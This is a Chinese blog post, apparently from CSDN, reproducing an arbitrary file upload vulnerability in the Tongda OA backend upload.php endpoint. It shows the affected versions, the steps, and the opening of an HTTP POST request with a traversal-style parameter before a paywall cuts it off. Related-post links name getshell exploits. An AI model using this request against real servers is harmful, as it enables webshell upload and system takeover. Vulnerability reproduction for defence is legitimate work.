通达OA后台management任意文件上传

已于 2023-08-09 23:21:59 修改
阅读量324 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2023-08-09 22:20:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/132198578
版权

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,后台/general/data_center/utils/upload.php存在任意文件上传漏洞,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。

二、 影响版本

  • 通达OA2017 -通达OAV11.6

三、漏洞复现

  1. 通过弱口令或任意用户登录漏洞获取cookie。
  2. 通过获取的cookie上传文件
POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: PHPSESSID=bdvsg4irn4bm2
了解本专栏 订阅专栏 解锁全文 超级会员免费看
xiaokp7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
通达OA后台ispirit任意文件上传
xiaokp7的博客
07-30 411
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,ispirit/im/upload.php文件存在任意文件上传,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。
通达OA任意文件上传_文件包含GetShell1
08-03
下载 通达 V11 (https://pan.baidu.com/s/15gcdBuOFrN1F9xVN7Q7GSA) 密码 enqx使用 解密工具 (http
oa 11.10 未授权任意文件上传及提权
失心少年
06-03 874
通达oa一键getshell
漏洞任意下载文件怎么下载_漏洞挖掘之通达OA2017任意文件上传_入门白帽子教程
最新发布
程序员三九的博客
06-06 316
关于通达OA通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
qq_51577576的博客
03-06 2715
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
【漏洞复现】通达OA后台im任意文件上传漏洞
xiaokp7的博客
06-19 685
通达OA是一款基于Web的企业级办公自动化软件,旨在提高组织内部工作效率和协同能力。它以电子邮件、日程安排、文档管理、人力资源、财务管理等模块为基础,满足企业内部各个部门的需求。通达OA “组织”->”管理员”->附件上传处存在任意文件上传漏洞,结合 “系统管理”->”附件管理”->”添加存储目录”,修改附件上传后保存的路径,最终导致getshell。
通达OA任意文件上传配合文件包含导致的RCE.md
04-12
通达OA任意文件上传配合文件包含导致的RCE
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA 2017注册文件,破解文件,
01-13
通达OA 2017注册文件,破解文件,已经测试,很好用 【没有用户限制,不限制安装次数】
通达OA后台module任意文件上传
xiaokp7的博客
07-13 383
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,后台个人文件柜处/module/upload/upload.php存在任意文件上传漏洞,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。
通达OA前台RCE加EXP任意文件上传+文件包含.py
03-18
通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含
tongda_oa_rce:通达oa越权登录+文件上传getshell
03-20
通达OA越权登录+文件上传getshell 用法 点安装-r requirements.txt python tongda.py url.txt:测试url,支持批量 shell.txt:上传成功的webshel​​l cookie.txt:登录成功的cookie webshel​​l密码a 已测试版本 <v11.5 v2017 遵守《网络安全法》,不要用于非法用途 参考
通达OA前台action任意文件上传
xiaokp7的博客
08-02 641
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。
漏洞挖掘之通达OA2017任意文件上传(漏洞已失效)
crowsec
02-10 3289
通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户。
[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
qq_51577576的博客
04-14 4986
一、漏洞编号 二、漏洞靶场 三、漏洞影响版本 四、FOFA Dork/Google Dork 五、利用漏洞风险 六、漏洞修复方案 七、漏洞利用过程
通达OA 任意文件上传+文件包含导致RCE
Adminxe的博客
09-23 1333
0x00 漏洞描述 ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell 0x01 漏洞影响版本 通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.1...
[ 漏洞复现篇 ]通达 OA11.6 文件删除 + 任意文件上传 rce 漏洞复现
qq_51577576的博客
03-28 3812
🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 🍬 博主介绍 1. 漏洞简介 2.漏洞影响版本 3. 漏洞环境搭建 4. 漏洞复现 5. Exp 6.漏洞修复 1. 漏洞简介 通达...
通达OA任意文件上传+文件包含GetShell
爱国小白帽
03-28 4347
通达OA任意文件上传+文件包含GetShell 原创 li9hu [Timeline Sec](javascript:void(0)???? 昨天 本公众号专注于最新漏洞复现,欢迎关注! ------------------------------------------------------------------------------------ 本文作者:li9hu(Timeline Sec复...
通达OA精灵操作指南:即时通讯与文件传输详解
通达OA精灵操作说明文档详细介绍了这款企业级办公管理系统的几个核心功能模块,旨在提升团队协作效率。文档首先着重于TIM即时通讯功能,这是通达OA精灵中的一个重要组成部分。 1. TIM即时通讯是文档的核心焦点,它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值